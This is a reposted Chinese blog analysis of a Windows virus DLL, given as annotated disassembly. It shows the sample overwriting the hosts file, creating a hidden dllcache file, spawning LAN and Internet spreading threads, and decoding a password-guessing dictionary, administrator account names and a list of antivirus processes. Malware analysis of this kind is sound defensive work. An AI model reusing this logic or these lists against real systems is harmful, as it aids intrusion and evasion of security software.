85C0 test eax, eax 10005CAC 75 0E jnz short 10005CBC ; y不等于零就跳 转 10005CAE 3905 10900010 cmp dword ptr [10009010], eax 10005CB4 7E 2E jle short 10005CE4 10005CB6 FF0D 10900010 dec dword ptr [10009010] 10005CBC 8B0D 90610010 mov ecx, dword ptr [10006190] ; MSVCRT._adjust_fdiv 10005CC2 83F8 01 cmp eax, 1 10005CC5 8B09 mov ecx, dword ptr [ecx] 10005CC7 890D 90940010 mov dword ptr [10009490], ecx 10005CCD 75 3F jnz short 10005D0E ; eax等于不等 于一就跳转 10005CCF 68 80000000 push 80 ; 分配80字节空 间 10005CD4 FF15 94610010 call dword ptr [10006194] ; MSVCRT.malloc 10005CDA 85C0 test eax, eax ; pam80刚分 配的地址空间 10005CDC 59 pop ecx 10005CDD A3 98940010 mov dword ptr [10009498], eax ; 把刚分配的空间 pam80地址给10009498 10005CE2 75 04 jnz short 10005CE8 10005CE4 33C0 xor eax, eax ; 分配失败就返回 false 10005CE6 EB 66 jmp short 10005D4E 10005CE8 8320 00 and dword ptr [eax], 0 10005CEB A1 98940010 mov eax, dword ptr [10009498] 10005CF0 68 04800010 push 10008004 10005CF5 68 00800010 push 10008000 10005CFA A3 94940010 mov dword ptr [10009494], eax 10005CFF E8 EA000000 call 10005DEE ; jmp 到 MSVCRT._initterm 10005D04 FF05 10900010 inc dword ptr [10009010] ; 【9010】加 一 10005D0A 59 pop ecx 10005D0B 59 pop ecx 10005D0C EB 3D jmp short 10005D4B ; 退出是返回一, 再【9498】存分配的80地址空间 10005D0E 85C0 test eax, eax 10005D10 75 39 jnz short 10005D4B ; 不等于零也跳转 退出函数,返回1 10005D12 A1 98940010 mov eax, dword ptr [10009498] 10005D17 85C0 test eax, eax 10005D19 74 30 je short 10005D4B 10005D1B 8B0D 94940010 mov ecx, dword ptr [10009494] 10005D21 56 push esi 10005D22 8D71 FC lea esi, dword ptr [ecx-4] 10005D25 3BF0 cmp esi, eax 10005D27 72 12 jb short 10005D3B 10005D29 8B0E mov ecx, dword ptr [esi] 10005D2B 85C9 test ecx, ecx 10005D2D 74 07 je short 10005D36 10005D2F FFD1 call ecx 10005D31 A1 98940010 mov eax, dword ptr [10009498] 10005D36 83EE 04 sub esi, 4 10005D39 ^ EB EA jmp short 10005D25 10005D3B 50 push eax 10005D3C FF15 9C610010 call dword ptr [1000619C] ; MSVCRT.free 10005D42 8325 98940010 0>and dword ptr [10009498], 0 10005D49 59 pop ecx 10005D4A 5E pop esi 10005D4B 6A 01 push 1 10005D4D 58 pop eax 10005D4E C2 0C00 retn 0C 主函数创建的线程函数,创建几个子线程,创建了系统目录\dllcache\systembox.bak,并打开了该文件的内存映射 系统目录/drivers/etc/hosts文件在文件中写ASCII "127.0.0.1 localhost",CR,LF 1000332A 55 push ebp ; 线程过程 函数 1000332B 8BEC mov ebp, esp 1000332D 6A FF push -1 1000332F 68 186D0010 push 10006D18 10003334 68 705E0010 push 10005E70 ; 定义 excepion_re的第二成员进栈MSVCRT._except_handler3 10003339 64:A1 00000000 mov eax, dword ptr fs:[0] ; 前一个异 常handler3,fs【0】上是exception_restration结构指针 1000333F 50 push eax 10003340 64:8925 0000000>mov dword ptr fs: [0], esp ; fs【0】指向刚定义的excepion_re 10003347 51 push ecx 10003348 51 push ecx 10003349 81EC 44010000 sub esp, 144 ; 分配空间 1000334F 53 push ebx 10003350 56 push esi 10003351 57 push edi 10003352 8965 E8 mov dword ptr [ebp- 18], esp ; s_esp记录【ebp-18】 10003355 68 E4670010 push 100067E4 ; 创建事 件 ASCII "4F9E860C-9BE9-474b-8FD1-F0EEDB20C77B" 1000335A 6A 00 push 0 1000335C 6A 01 push 1 1000335E 6A 00 push 0 10003360 FF15 38610010 call dword ptr [10006138] ; kernel32.CreateEventA 10003366 A3 80940010 mov dword ptr [10009480], eax ; hevent 【9480】事件句柄 1000336B 833D 80940010 0>cmp dword ptr [10009480], 0 10003372 74 0D je short 10003381 10003374 FF15 94600010 call dword ptr [10006094] ; ntdll.RtlGetLastWin32Error 1000337A 3D B7000000 cmp eax, 0B7 1000337F 75 08 jnz short 10003389 ; 不是 0b7错误就继续执行,是就退出 10003381 6A 00 push 0 10003383 FF15 98600010 call dword ptr [10006098] ; kernel32.ExitThread 10003389 8365 FC 00 and dword ptr [ebp-4], 0 1000338D E8 BB030000 call 1000374D ; 线程中可 以创建事件,就调用sleep函数 10003392 834D FC FF or dword ptr [ebp-4], FFFFFFFF 10003396 EB 0B jmp short 100033A3 10003398 33C0 xor eax, eax 1000339A 40 inc eax 1000339B C3 retn 1000339C 8B65 E8 mov esp, dword ptr [ebp-18] 1000339F 834D FC FF or dword ptr [ebp-4], FFFFFFFF 100033A3 6A 00 push 0 100033A5 6A 00 push 0 100033A7 6A 00 push 0 100033A9 68 333F0010 push 10003F33 100033AE 6A 00 push 0 100033B0 6A 00 push 0 100033B2 FF15 68610010 call dword ptr [10006168] ; kernel32.CreateThread 100033B8 6A 00 push 0 100033BA 6A 00 push 0 100033BC 6A 00 push 0 100033BE 68 D7180010 push 100018D7 100033C3 6A 00 push 0 100033C5 6A 00 push 0 100033C7 FF15 68610010 call dword ptr [10006168] ; kernel32.CreateThread 100033CD 8945 E0 mov dword ptr [ebp-20], eax 100033D0 6A 00 push 0 100033D2 6A 00 push 0 100033D4 6A 00 push 0 100033D6 68 8D3A0010 push 10003A8D 100033DB 6A 00 push 0 100033DD 6A 00 push 0 100033DF FF15 68610010 call dword ptr [10006168] ; kernel32.CreateThread 100033E5 6A 00 push 0 100033E7 6A 00 push 0 100033E9 6A 00 push 0 100033EB 68 18460010 push 10004618 100033F0 6A 00 push 0 100033F2 6A 00 push 0 100033F4 FF15 68610010 call dword ptr [10006168] ; kernel32.CreateThread 100033FA 33C0 xor eax, eax 100033FC 40 inc eax 100033FD 74 36 je short 10003435 100033FF FF15 6C610010 call dword ptr [1000616C] ; kernel32.GetTickCount 10003405 8985 CCFEFFFF mov dword ptr [ebp-134], eax ; 获得系统 开机到当前的时间 1000340B 8B85 CCFEFFFF mov eax, dword ptr [ebp- 134] ; tickcount【ebp-134】 10003411 33D2 xor edx, edx 10003413 B9 E8030000 mov ecx, 3E8 10003418 F7F1 div ecx ; tickcount/3e8 1000341A 33D2 xor edx, edx 1000341C 6A 3C push 3C 1000341E 59 pop ecx 1000341F F7F1 div ecx 10003421 83F8 03 cmp eax, 3 ; tickcount/3e8 /3c再跟3比较大小 10003424 72 02 jb short 10003428 10003426 EB 0D jmp short 10003435 10003428 68 E8030000 push 3E8 ; 等等 3e8微妙 1000342D FF15 DC600010 call dword ptr [100060DC] ; kernel32.Sleep 10003433 ^ EB C5 jmp short 100033FA ; 再回去取 系统时间,直到tickcount/3e8/3c比3小 10003435 68 04010000 push 104 1000343A 6A 00 push 0 1000343C 8D85 D0FEFFFF lea eax, dword ptr [ebp-130] 10003442 50 push eax 10003443 E8 46280000 call 10005C8E ; jmp 到 MSVCRT.memset 10003448 83C4 0C add esp, 0C 1000344B 68 04010000 push 104 10003450 8D85 D0FEFFFF lea eax, dword ptr [ebp-130] 10003456 50 push eax 10003457 FF15 2C610010 call dword ptr [1000612C] ; kernel32.GetSystemDirectoryA 1000345D 68 0C680010 push 1000680C ; ASCII "\drivers\etc\hosts" 10003462 8D85 D0FEFFFF lea eax, dword ptr [ebp-130] 10003468 50 push eax 10003469 FF15 E4600010 call dword ptr [100060E4] ; kernel32.lstrcatA 1000346F 6A 00 push 0 10003471 68 80000000 push 80 10003476 6A 03 push 3 10003478 6A 00 push 0 1000347A 6A 03 push 3 1000347C 68 000000C0 push C0000000 10003481 8D85 D0FEFFFF lea eax, dword ptr [ebp-130] ; 系统目录 /drivers/etc/hosts 10003487 50 push eax 10003488 FF15 C0600010 call dword ptr [100060C0] ; kernel32.CreateFileA 1000348E 8945 D8 mov dword ptr [ebp-28], eax 10003491 C745 DC 2068001>mov dword ptr [ebp-24], 10006820 ; ASCII "127.0.0.1 localhost",CR,LF 10003498 6A 00 push 0 1000349A 8D45 E4 lea eax, dword ptr [ebp-1C] 1000349D 50 push eax 1000349E FF75 DC push dword ptr [ebp-24] 100034A1 FF15 C8600010 call dword ptr [100060C8] ; kernel32.lstrlenA 100034A7 50 push eax ; 长度 100034A8 FF75 DC push dword ptr [ebp-24] ; ASCII "127.0.0.1 localhost",CR,LF 100034AB FF75 D8 push dword ptr [ebp-28] ; 创建文件 “系统目录/drivers/etc/hosts”,并向文件中写入“127.0.0.1 localhost 100034AE FF15 30610010 call dword ptr [10006130] ; kernel32.WriteFile 100034B4 FF75 D8 push dword ptr [ebp-28] 100034B7 FF15 18610010 call dword ptr [10006118] ; kernel32.SetEndOfFile 100034BD FF75 D8 push dword ptr [ebp-28] 100034C0 FF15 FC600010 call dword ptr [100060FC] ; kernel32.CloseHandle 100034C6 68 04010000 push 104 100034CB 6A 00 push 0 100034CD 68 28930010 push 10009328 100034D2 E8 B7270000 call 10005C8E ; jmp 到 MSVCRT.memset 100034D7 83C4 0C add esp, 0C 100034DA 68 04010000 push 104 100034DF 68 28930010 push 10009328 100034E4 FF15 2C610010 call dword ptr [1000612C] ; kernel32.GetSystemDirectoryA 100034EA 68 3C680010 push 1000683C ; ASCII "\dllcache\systembox.bak" 100034EF 68 28930010 push 10009328 ; 系统目 录\dllcache\systembox.bak 100034F4 FF15 E4600010 call dword ptr [100060E4] ; kernel32.lstrcatA 100034FA 83A5 C8FEFFFF 0>and dword ptr [ebp-138], 0 10003501 EB 0D jmp short 10003510 10003503 8B85 C8FEFFFF mov eax, dword ptr [ebp-138] 10003509 40 inc eax 1000350A 8985 C8FEFFFF mov dword ptr [ebp-138], eax 10003510 83BD C8FEFFFF 6>cmp dword ptr [ebp-138], 64 10003517 7D 57 jge short 10003570 ; 创建64 次文件才停止 10003519 6A 00 push 0 1000351B 68 80000000 push 80 10003520 6A 03 push 3 10003522 6A 00 push 0 10003524 6A 00 push 0 10003526 68 00000080 push 80000000 1000352B 68 28930010 push 10009328 ; 创建了系 统目录\dllcache\systembox.bak 10003530 FF15 C0600010 call dword ptr [100060C0] ; kernel32.CreateFileA 10003536 8985 C4FEFFFF mov dword ptr [ebp-13C], eax 1000353C 83BD C4FEFFFF F>cmp dword ptr [ebp-13C], -1 10003543 74 21 je short 10003566 10003545 6A 00 push 0 10003547 FFB5 C4FEFFFF push dword ptr [ebp-13C] 1000354D FF15 C4600010 call dword ptr [100060C4] ; kernel32.GetFileSize 10003553 A3 84940010 mov dword ptr [10009484], eax 10003558 FFB5 C4FEFFFF push dword ptr [ebp-13C] 1000355E FF15 FC600010 call dword ptr [100060FC] ; kernel32.CloseHandle 10003564 EB 0A jmp short 10003570 10003566 6A 64 push 64 ; 等待64 微秒 10003568 FF15 DC600010 call dword ptr [100060DC] ; kernel32.Sleep 1000356E ^ EB 93 jmp short 10003503 10003570 833D 84940010 0>cmp dword ptr [10009484], 0 10003577 0F86 F5000000 jbe 10003672 1000357D 833D 84940010 F>cmp dword ptr [10009484], -1 10003584 0F84 E8000000 je 10003672 1000358A 6A 00 push 0 1000358C 68 80000000 push 80 10003591 6A 03 push 3 10003593 6A 00 push 0 10003595 6A 01 push 1 10003597 68 00000080 push 80000000 1000359C 68 28930010 push 10009328 ; 再创建文 件 100035A1 FF15 C0600010 call dword ptr [100060C0] ; kernel32.CreateFileA 100035A7 A3 04900010 mov dword ptr [10009004], eax 100035AC 6A 00 push 0 100035AE 6A 00 push 0 100035B0 6A 00 push 0 100035B2 6A 02 push 2 100035B4 6A 00 push 0 100035B6 FF35 04900010 push dword ptr [10009004] ; 创建文件 映射,刚创建的文件句柄 100035BC FF15 58610010 call dword ptr [10006158] ; kernel32.CreateFileMappingA 100035C2 A3 74940010 mov dword ptr [10009474], eax 100035C7 6A 00 push 0 ; 映射字 节,0表全部 100035C9 6A 00 push 0 100035CB 6A 00 push 0 100035CD 6A 04 push 4 ; 权限 100035CF FF35 74940010 push dword ptr [10009474] ; 映射文件 一部分到线程空间,文件映射句柄 100035D5 FF15 10610010 call dword ptr [10006110] ; kernel32.MapViewOfFile 100035DB A3 70940010 mov dword ptr [10009470], eax ; 映射内存 地址 100035E0 833D 54840010 0>cmp dword ptr [10008454], 0 100035E7 74 1E je short 10003607 100035E9 833D 70940010 0>cmp dword ptr [10009470], 0 100035F0 74 15 je short 10003607 ; 映射失败 跳转 100035F2 6A 00 push 0 100035F4 6A 00 push 0 100035F6 6A 00 push 0 100035F8 68 1F310010 push 1000311F ; 线程过程 函数 100035FD 6A 00 push 0 100035FF 6A 00 push 0 ; 映射成 功,就创建线程 10003601 FF15 68610010 call dword ptr [10006168] ; kernel32.CreateThread 10003607 833D 60840010 0>cmp dword ptr [10008460], 0 1000360E 74 18 je short 10003628 10003610 6A 00 push 0 10003612 6A 00 push 0 10003614 68 54680010 push 10006854 ; 传入参 数 ASCII "LAN" 10003619 68 65520010 push 10005265 1000361E 6A 00 push 0 10003620 6A 00 push 0 10003622 FF15 68610010 call dword ptr [10006168] ; kernel32.CreateThread 10003628 833D 5C840010 0>cmp dword ptr [1000845C], 0 1000362F 74 15 je short 10003646 10003631 6A 00 push 0 10003633 6A 00 push 0 10003635 6A 00 push 0 10003637 68 E1580010 push 100058E1 1000363C 6A 00 push 0 1000363E 6A 00 push 0 10003640 FF15 68610010 call dword ptr [10006168] ; kernel32.CreateThread 10003646 6A FF push -1 ; 无限等待 10003648 FF75 E0 push dword ptr [ebp-20] ; 等待过程 函数为18d7的线程执行完 1000364B FF15 1C610010 call dword ptr [1000611C] ; kernel32.WaitForSingleObject 10003651 833D 64840010 0>cmp dword ptr [10008464], 0 10003658 74 18 je short 10003672 1000365A 6A 00 push 0 1000365C 6A 00 push 0 1000365E 68 58680010 push 10006858 ; 传入参数 ASCII "Internet" 10003663 68 65520010 push 10005265 10003668 6A 00 push 0 1000366A 6A 00 push 0 1000366C FF15 68610010 call dword ptr [10006168] ; kernel32.CreateThread 10003672 833D 68840010 0>cmp dword ptr [10008468], 0 10003679 74 29 je short 100036A4 1000367B 6A 01 push 1 1000367D 0FB705 50840010 movzx eax, word ptr [10008450] 10003684 50 push eax 10003685 E8 E2DAFFFF call 1000116C 1000368A 83F8 01 cmp eax, 1 1000368D 75 15 jnz short 100036A4 1000368F 6A 00 push 0 10003691 6A 00 push 0 10003693 6A 00 push 0 10003695 68 CB5A0010 push 10005ACB 1000369A 6A 00 push 0 1000369C 6A 00 push 0 1000369E FF15 68610010 call dword ptr [10006168] ; kernel32.CreateThread 100036A4 833D 6C840010 0>cmp dword ptr [1000846C], 0 100036AB 74 7B je short 10003728 100036AD 8D85 A4FEFFFF lea eax, dword ptr [ebp-15C] 100036B3 50 push eax 100036B4 FF15 90600010 call dword ptr [10006090] ; kernel32.GetLocalTime 100036BA 33C0 xor eax, eax 100036BC 40 inc eax 100036BD 74 69 je short 10003728 100036BF 8D85 B4FEFFFF lea eax, dword ptr [ebp-14C] 100036C5 50 push eax 100036C6 FF15 90600010 call dword ptr [10006090] ; kernel32.GetLocalTime 100036CC 0FB785 BCFEFFFF movzx eax, word ptr [ebp-144] 100036D3 0FB78D ACFEFFFF movzx ecx, word ptr [ebp-154] 100036DA 2BC1 sub eax, ecx 100036DC 3B05 6C840010 cmp eax, dword ptr [1000846C] 100036E2 7C 37 jl short 1000371B 100036E4 66:8B85 BCFEFFF>mov ax, word ptr [ebp-144] 100036EB 66:8985 ACFEFFF>mov word ptr [ebp-154], ax 100036F2 6A 01 push 1 100036F4 0FB705 50840010 movzx eax, word ptr [10008450] 100036FB 50 push eax 100036FC E8 6BDAFFFF call 1000116C 10003701 83F8 01 cmp eax, 1 10003704 75 15 jnz short 1000371B 10003706 6A 00 push 0 10003708 6A 00 push 0 1000370A 6A 00 push 0 1000370C 68 CB5A0010 push 10005ACB 10003711 6A 00 push 0 10003713 6A 00 push 0 10003715 FF15 68610010 call dword ptr [10006168] ; kernel32.CreateThread 1000371B 68 60EA0000 push 0EA60 10003720 FF15 DC600010 call dword ptr [100060DC] ; kernel32.Sleep 10003726 ^ EB 92 jmp short 100036BA 10003728 33C0 xor eax, eax 1000372A 40 inc eax 1000372B 74 0D je short 1000373A 1000372D 68 10270000 push 2710 10003732 FF15 DC600010 call dword ptr [100060DC] ; kernel32.Sleep 10003738 ^ EB EE jmp short 10003728 1000373A 33C0 xor eax, eax 1000373C 8B4D F0 mov ecx, dword ptr [ebp-10] 1000373F 64:890D 0000000>mov dword ptr fs:[0], ecx 10003746 5F pop edi 10003747 5E pop esi 10003748 5B pop ebx 10003749 C9 leave 1000374A C2 0400 retn 4 线程自定义的函数: sleep函数1000374D 函数功能: 睡眠【8480】秒 【【8488】】=((byte)【8488】-1)^a5 8518 ; 取字符串的一字节 ASCII "n,Administrator,Guest,admin,Root,"2c清零 8540; ASCII "n,1234,password,6969,harley,123456,golf,pussy,mustang,1111,shadow,1313,fish,5150,7777,qwerty,baseball ,2112,letmein,12345678,12345,ccc,admin,5201314,qq520,1,12,123,1234567,123456789,654321,54321,111,000000,abc,pw,11111111 ,88888888,pass,pa"...2c清零 87B0 ; ASCII "360hotfix.exe|360rpt.exe|360safe.exe|360safebox.exe|360tray.exe|agentsvr.exe|apvxdwin.exe|ast.exe| avcenter.exe|avengine.exe|avgnt.exe|avguard.exe|avltmain.exe|avp32.exe|avtask.exe|bdagent.exe|bdwizreg.exe|boxmod.exe| ccapp.exe|ccenter.exe"... ; 处理完字符串就跳转,把7c和2c清零 函数的具体分析: 1000374D 55 push ebp ; sleep 函数 1000374E 8BEC mov ebp, esp 10003750 51 push ecx 10003751 51 push ecx 10003752 8365 FC 00 and dword ptr [ebp-4], 0 10003756 FF35 80840010 push dword ptr [10008480] 1000375C FF15 DC600010 call dword ptr [100060DC] ; kernel32.Sleep 10003762 6A 40 push 40 10003764 6A 00 push 0 10003766 68 30940010 push 10009430 ; 【9430】 清空 1000376B E8 1E250000 call 10005C8E ; jmp 到 MSVCRT.memset 10003770 83C4 0C add esp, 0C 10003773 68 00010000 push 100 10003778 6A 00 push 0 1000377A 68 28920010 push 10009228 ; 【9228】 清零 1000377F E8 0A250000 call 10005C8E ; jmp 到 MSVCRT.memset 10003784 83C4 0C add esp, 0C 10003787 C745 FC 8884001>mov dword ptr [ebp-4], 10008488 ; 读 取【8488】的一个字节 1000378E 8B45 FC mov eax, dword ptr [ebp-4] 10003791 0FBE00 movsx eax, byte ptr [eax] 10003794 85C0 test eax, eax ; 判断这个 字节是否为零 10003796 74 2D je short 100037C5 ; 为零,处 理完8488字符串,就跳转 10003798 8B45 FC mov eax, dword ptr [ebp-4] ; 不为零 【8488】存在pstr(【ebp-4】),取一字节给【ebp-5】 1000379B 8A00 mov al, byte ptr [eax] 1000379D 8845 FB mov byte ptr [ebp-5], al 100037A0 8A45 FB mov al, byte ptr [ebp-5] 100037A3 2C 01 sub al, 1 100037A5 8845 FB mov byte ptr [ebp-5], al ; 存在 【ebp-5】的字节减去一 100037A8 0FBE45 FB movsx eax, byte ptr [ebp-5] 100037AC 35 A5000000 xor eax, 0A5 100037B1 8845 FB mov byte ptr [ebp- 5], al ; 【ebp-5】再和a5异或 100037B4 8B45 FC mov eax, dword ptr [ebp-4] 100037B7 8A4D FB mov cl, byte ptr [ebp-5] 100037BA 8808 mov byte ptr [eax], cl ; 【【8488】】= ((byte)【8488】-1)^a5 100037BC 8B45 FC mov eax, dword ptr [ebp-4] 100037BF 40 inc eax 100037C0 8945 FC mov dword ptr [ebp- 4], eax ; pstr[ebp-4]指向下一个字节 100037C3 ^ EB C9 jmp short 1000378E 100037C5 C745 FC D084001>mov dword ptr [ebp-4], 100084D0 100037CC 8B45 FC mov eax, dword ptr [ebp-4] 100037CF 0FBE00 movsx eax, byte ptr [eax] ; 取 (byte)【84d0】判断是否为零 100037D2 85C0 test eax, eax 100037D4 74 2D je short 10003803 100037D6 8B45 FC mov eax, dword ptr [ebp-4] ; pstr 【ebp-4】 100037D9 8A00 mov al, byte ptr [eax] 100037DB 8845 FA mov byte ptr [ebp-6], al 100037DE 8A45 FA mov al, byte ptr [ebp-6] 100037E1 2C 01 sub al, 1 100037E3 8845 FA mov byte ptr [ebp-6], al 100037E6 0FBE45 FA movsx eax, byte ptr [ebp-6] 100037EA 35 A5000000 xor eax, 0A5 100037EF 8845 FA mov byte ptr [ebp-6], al 100037F2 8B45 FC mov eax, dword ptr [ebp-4] 100037F5 8A4D FA mov cl, byte ptr [ebp-6] 100037F8 8808 mov byte ptr [eax], cl ; 【【8488】】= ((byte)【8488】-1)^a5 100037FA 8B45 FC mov eax, dword ptr [ebp-4] 100037FD 40 inc eax 100037FE 8945 FC mov dword ptr [ebp-4], eax ; pstr 【ebp-4】指向下雨字节 10003801 ^ EB C9 jmp short 100037CC ; 处理完两 个字符串就执行 10003803 C745 FC 1885001>mov dword ptr [ebp-4], 10008518 ; ASCII "n,Administrator,Guest,admin,Root," 1000380A 8B45 FC mov eax, dword ptr [ebp-4] 1000380D 0FBE00 movsx eax, byte ptr [eax] ; 取字符串 的一字节 ASCII "n,Administrator,Guest,admin,Root," 10003810 85C0 test eax, eax 10003812 74 1A je short 1000382E ; 处理完整 个字符串就跳转,把字符串的2c清零 10003814 8B45 FC mov eax, dword ptr [ebp-4] 10003817 0FBE00 movsx eax, byte ptr [eax] 1000381A 83F8 2C cmp eax, 2C ; 字符串一 字节是否是2c, ASCII "n,Administrator,Guest,admin,Root," 1000381D 75 06 jnz short 10003825 ; 不是2c 就跳转 1000381F 8B45 FC mov eax, dword ptr [ebp-4] ; 是2c, 把该字节清零 10003822 C600 00 mov byte ptr [eax], 0 10003825 8B45 FC mov eax, dword ptr [ebp-4] ; pstr 指向下一字节 10003828 40 inc eax 10003829 8945 FC mov dword ptr [ebp-4], eax 1000382C ^ EB DC jmp short 1000380A 1000382E C745 FC 4085001>mov dword ptr [ebp-4], 10008540 ; ASCII "n,1234,password,6969,harley,123456,golf,pussy,mustang,1111,shadow,1313,fish,5150,7777,qwerty,baseball,2112,letmein,12345678,12345,ccc,admin,5201314,qq520,1,12,123,1234567,123456789,654321,54321,111,000000,abc,pw,11111111,88888888,pass,pa"... 10003835 8B45 FC mov eax, dword ptr [ebp-4] 10003838 0FBE00 movsx eax, byte ptr [eax] 1000383B 85C0 test eax, eax 1000383D 74 1A je short 10003859 ; 处理完就 跳转,把2c清零 1000383F 8B45 FC mov eax, dword ptr [ebp-4] 10003842 0FBE00 movsx eax, byte ptr [eax] 10003845 83F8 2C cmp eax, 2C 10003848 75 06 jnz short 10003850 1000384A 8B45 FC mov eax, dword ptr [ebp-4] 1000384D C600 00 mov byte ptr [eax], 0 10003850 8B45 FC mov eax, dword ptr [ebp-4] 10003853 40 inc eax 10003854 8945 FC mov dword ptr [ebp-4], eax 10003857 ^ EB DC jmp short 10003835 10003859 C745 FC B087001>mov dword ptr [ebp-4], 100087B0 ; ASCII "360hotfix.exe|360rpt.exe|360safe.exe|360safebox.exe|360tray.exe|agentsvr.exe|apvxdwin.exe|ast.exe|avcenter.exe|avengine.exe|avgnt.exe|avguard.exe|avltmain.exe|avp32.exe|avtask.exe|bdagent.exe|bdwizreg.exe|boxmod.exe|ccapp.exe|ccenter.exe"... 10003860 8B45 FC mov eax, dword ptr [ebp-4] 10003863 0FBE00 movsx eax, byte ptr [eax] 10003866 85C0 test eax, eax 10003868 74 25 je short 1000388F ; 处理完字 符串就跳转,把7c和2c清零 1000386A 8B45 FC mov eax, dword ptr [ebp-4] 1000386D 0FBE00 movsx eax, byte ptr [eax] 10003870 83F8 7C cmp eax, 7C 10003873 74 0B je short 10003880 10003875 8B45 FC mov eax, dword ptr [ebp-4] 10003878 0FBE00 movsx eax, byte ptr [eax] 1000387B 83F8 2C cmp eax, 2C 1000387E 75 06 jnz short 10003886 10003880 8B45 FC mov eax, dword ptr [ebp-4] 10003883 C600 00 mov byte ptr [eax], 0 10003886 8B45 FC mov eax, dword ptr [ebp-4] 10003889 40 inc eax 1000388A 8945 FC mov dword ptr [ebp-4], eax 1000388D ^ EB D1 jmp short 10003860 1000388F C9 leave 10003890 C3 retn |
2010年6月4日星期五
轉帖:标准pe格式带病毒样本分析
【原创】标准pe格式带病毒样本分析。 
訂閱:
發佈留言 (Atom)
沒有留言:
發佈留言